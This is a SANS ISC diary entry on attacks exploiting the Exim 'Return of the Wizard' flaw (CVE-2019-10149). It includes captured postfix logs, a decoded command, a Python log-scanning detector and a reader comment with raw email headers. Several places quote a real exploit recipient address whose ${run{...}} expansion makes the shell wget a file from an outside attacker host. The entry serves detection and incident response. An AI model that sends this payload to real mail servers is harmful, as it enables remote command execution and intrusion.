
SANS ISC: Quick Detect: Exim "Return of the Wizard" Attack SANS ISC InfoSec Forums

Quick Detect: Exim "Return of the Wizard" Attack

Thanks to our reader Alex for sharing some of his mail logs with the latest attempts to exploit CVE-2019-10149 (aka "Return of the Wizard"). The vulnerability affects Exim and was patched about two weeks ago. There are likely still plenty of vulnerable servers, but it looks like attackers are branching out and are hitting servers not running Exim as well.

A couple of logs from our own mail server (running postfix):

Jun 19 10:47:10 mail postfix/smtp[19006]: A547240360F4: to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f70.91.145.10x22}}@dshield.org>, relay=204.51.94.153[204.51.94.153]:25, delay=0.82, delays=0.29/0.03/0.45/0.05, dsn=5.1.1, status=bounced (host 204.51.94.153[204.51.94.153] said: 550 5.1.1 <root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f70.91.145.10x22}}@dshield.org>: Recipient address rejected: User unknown in virtual alias table (in reply to RCPT TO command))

The exploit is attempting to run the following command:

/bin/sht-ct "wget 64.50.180.45/tmp/70.91.145.10"

Note that the IP at the end of the command is our mail server's public IP address. The URL no longer appears to exist; the host it points to is a server running cPanel.

The beginning of the command may actually be a mistake/typo. I believe the attacker is trying to run sh -ct, which would execute the string (wget..). 
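As an added example (not code from the diary or from the reader who sent the logs), here is a small Python detector that pulls `${run{...}}` expansions out of postfix `to=` / `orig_to=` recipient fields and decodes the escapes to show the command the sender wanted executed. It assumes the raw maillog still carries the backslashes (`\x2F`, `\t`) that the quoted lines above lost in rendering, with `\t` decoded as a tab; the log lines are constructed from the two entries quoted on this page.

```python
import re

# Constructed sample maillog lines modelled on the two postfix entries quoted on
# this page, with the backslashes restored that the web rendering dropped.
SAMPLE_LOG = r"""
Jun 19 10:47:10 mail postfix/smtp[19006]: A547240360F4: to=<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f70.91.145.10\x22}}@dshield.org>, relay=204.51.94.153[204.51.94.153]:25, dsn=5.1.1, status=bounced (host said: 550 5.1.1 Recipient address rejected)
Jun 19 11:02:48 ceres postfix/local[5675]: 603BE14007A: to=<user@mydomain>, orig_to=<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2fxxx.xxx.xxx.xxx\x22}}@mydomain>, relay=local, dsn=2.0.0, status=sent (delivered to maildir)
Jun 19 11:05:13 mail postfix/local[5680]: 7C0D1140088: to=<alice@mydomain>, relay=local, dsn=2.0.0, status=sent (delivered to maildir)
"""

QUEUE_RE = re.compile(r'postfix/[\w-]+\[\d+\]: ([0-9A-Fa-f]+):')   # postfix queue id
RCPT_RE = re.compile(r'\b(?:orig_to|to)=<([^>]*)>')               # recipient fields
RUN_RE = re.compile(r'\$\{run\{(.*?)\}\}')                         # Exim ${run{...}}
STATUS_RE = re.compile(r'status=(\w+)')
ESC_RE = re.compile(r'\\x([0-9A-Fa-f]{2})|\\t|\\n')                # \xHH, \t, \n

def decode_escapes(s):
    """Undo the backslash escapes Exim's string expansion would apply."""
    def one(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return '\t' if m.group(0) == r'\t' else '\n'
    return ESC_RE.sub(one, s)

def find_run_attempts(log_text):
    """Return one record per recipient address that carries a ${run{...}} expansion."""
    hits = []
    for line in log_text.splitlines():
        for rcpt in RCPT_RE.findall(line):
            run = RUN_RE.search(rcpt)
            if not run:
                continue
            q = QUEUE_RE.search(line)
            st = STATUS_RE.search(line)
            hits.append({
                'queue_id': q.group(1) if q else None,
                'recipient': rcpt,
                'command': decode_escapes(run.group(1)),
                'status': st.group(1) if st else None,   # 'sent' means it reached a mailbox
            })
    return hits

if __name__ == '__main__':
    for h in find_run_attempts(SAMPLE_LOG):
        print(h['queue_id'], h['status'], repr(h['command']))
```

On a postfix host the recipient is only a string, so the expansion never runs; the record is still useful for spotting which messages were delivered rather than bounced and which download hosts to look for in proxy or firewall logs.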

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
Help. I just got hit by this, although my log does not show that it bounced; instead it got through to my maildir.

Jun 19 11:02:48 ceres postfix/local[5675]: 603BE14007A: to=<emailaddressremoved>, orig_to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2fxxx.xxx.xxx.xxxx22}}@mydomain>, relay=local, delay=0.52, delays=0.42/0.04/0/0.07, dsn=2.0.0, status=sent (delivered to maildir)

How do I fix this?

Here is the email that was received. All this is in the header. The subject and body were blank.

Return-Path: <support@service.com>
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2fxxx.xxx.xxx.xxxx22}}@mydomain.com
Delivered-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f173.23.66.8x22}}@mydomain.com
Received: from service.com (unknown [45.55.94.254])
by mail.mydomain.com (Postfix) with SMTP id 603BE14007A;
Wed, 19 Jun 2019 11:02:48 -0500 (CDT)
Anonymous